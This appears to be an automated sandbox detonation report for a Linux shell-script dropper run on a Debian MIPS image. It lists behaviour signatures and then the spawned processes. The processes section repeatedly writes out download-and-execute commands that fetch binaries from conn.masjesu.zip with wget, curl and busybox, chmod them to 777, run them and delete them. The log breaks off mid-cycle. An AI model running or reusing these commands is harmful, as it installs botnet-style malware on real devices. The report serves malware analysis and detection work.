/tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-25 01:07
Reported
2024-10-25 01:10
Platform
debian9-mipsel-20240611-en
Max time kernel
118s
Max time network
120s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg | /tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg | N/A |
| N/A | /tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23 | /tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23 | N/A |
| N/A | /tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb | /tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb | N/A |
| N/A | /tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE | /tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE | N/A |
| N/A | /tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm | /tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm | N/A |
| N/A | /tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO | /tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO | N/A |
| N/A | /tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM | /tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM | N/A |
| N/A | /tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY | /tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY | N/A |
| N/A | /tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB | /tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB | N/A |
| N/A | /tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi | /tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi | N/A |
| N/A | /tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8 | /tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8 | N/A |
| N/A | /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D | /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D | N/A |
| N/A | /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA | /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA | N/A |
| N/A | /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF | /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF | N/A |
| N/A | /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D | /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D | N/A |
| N/A | /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA | /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA | N/A |
| N/A | /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF | /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF | N/A |
| N/A | /tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23 | /tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23 | N/A |
| N/A | /tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb | /tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb | N/A |
| N/A | /tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE | /tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE | N/A |
| N/A | /tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm | /tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm | N/A |
| N/A | /tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg | /tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg | N/A |
| N/A | /tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO | /tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO | N/A |
| N/A | /tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM | /tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM | N/A |
| N/A | /tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY | /tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY | N/A |
| N/A | /tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB | /tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB | N/A |
| N/A | /tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi | /tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi | N/A |
| N/A | /tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8 | /tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg | /usr/bin/curl | N/A |
| File opened for modification | /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb | /usr/bin/curl | N/A |
| File opened for modification | /tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg | /usr/bin/curl | N/A |
| File opened for modification | /tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB | /usr/bin/curl | N/A |
Processes
/tmp/1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh
[/tmp/1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]
/bin/chmod
[chmod 777 3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]
/tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg
[./3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]
/bin/rm
[rm 3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]
/bin/chmod
[chmod 777 N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]
/tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23
[./N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]
/bin/rm
[rm N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]
/bin/chmod
[chmod 777 1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]
/tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb
[./1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]
/bin/rm
[rm 1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]
/bin/chmod
[chmod 777 LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]
/tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE
[./LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]
/bin/rm
[rm LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]
/bin/chmod
[chmod 777 rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]
/tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm
[./rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]
/bin/rm
[rm rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]
/bin/chmod
[chmod 777 EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]
/tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO
[./EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]
/bin/rm
[rm EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]
/bin/chmod
[chmod 777 Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]
/tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM
[./Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]
/bin/rm
[rm Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]
/bin/chmod
[chmod 777 o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]
/tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY
[./o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]
/bin/rm
[rm o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]
/bin/chmod
[chmod 777 k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]
/tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB
[./k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]
/bin/rm
[rm k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]
/bin/chmod
[chmod 777 y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]
/tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi
[./y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]
/bin/rm
[rm y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]
/bin/chmod
[chmod 777 3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]
/tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8
[./3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]
/bin/rm
[rm 3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]
/bin/chmod
[chmod 777 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]
/tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D
[./8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]
/bin/rm
[rm 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]
/bin/chmod
[chmod 777 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]
/tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA
[./9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]
/bin/rm
[rm 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]
/bin/chmod
[chmod 777 COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]
/tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF
[./COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]
/bin/rm
[rm COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]
/bin/chmod
[chmod 777 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]
/tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D
[./8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]
/bin/rm
[rm 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]
/bin/chmod
[chmod 777 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]
/tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA
[./9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]
/bin/rm
[rm 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]
/bin/chmod
[chmod 777 COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]
/tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF
[./COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]
/bin/rm
[rm COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]
/bin/chmod
[chmod 777 N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]
/tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23
[./N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]
/bin/rm
[rm N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]
/bin/chmod
[chmod 777 1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]
/tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb
[./1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]
/bin/rm
[rm 1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]
/usr/bin/curl
